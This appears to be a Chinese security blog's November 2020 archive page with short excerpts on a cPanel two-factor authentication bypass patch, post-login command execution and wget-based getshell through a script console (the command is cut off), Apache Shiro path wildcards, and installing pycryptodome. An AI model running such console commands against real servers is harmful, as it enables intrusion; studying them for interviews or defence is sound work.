11 2020 档案
发表于 2020-11-30 10:17阅读:1691评论:0推荐:0
摘要:cPanel是管理web托管的流行管理工具的提供商,它修补了一个安全漏洞,该漏洞可能允许远程攻击者访问有效凭据,绕过帐户的两因素身份验证(2FA)保护。 该问题被称为“seco -575”,由Digital Defense研究人员发现,该公司在软件的11.92.0.2、11.90.0.17和11.8
阅读全文 »
发表于 2020-11-22 16:48阅读:3471评论:0推荐:0
摘要:昨天晚上面试官问到了,还没来得及看,今天又问到了,猝不及防,蓝瘦,香菇、、、 今天特此总结一下,给自己一个交代。 总述:进入后台可进行如下操作: 直接执行系统命令: println "cmd".execute().text wget下载文件getshell: println "wget http:/
阅读全文 »
发表于 2020-11-22 15:33阅读:2783评论:0推荐:0
摘要:##简述: shiro框架通过拦截功能来实现对用户访问权限的控制和拦截,shiro里面支持Ant风格的通配符。 ?:匹配任意的一个字符,例如:"/admin?"可以匹配“/admin1”,"/admin2"。 *:匹配一个或者多个任意的字符。 **:匹配零个或者多个目录。 设置路径通配符: [mai
阅读全文 »
发表于 2020-11-20 18:23阅读:827评论:0推荐:0
摘要:先卸载Crypto和pycrypto(pycrypto根本就没安装上,如果你运气好安装上了,那么恭喜你) pip uninstall Crypto pip uninstall pycrypto 然后安装第三方库pycryptodome pip install pycryptodome
阅读全文 »
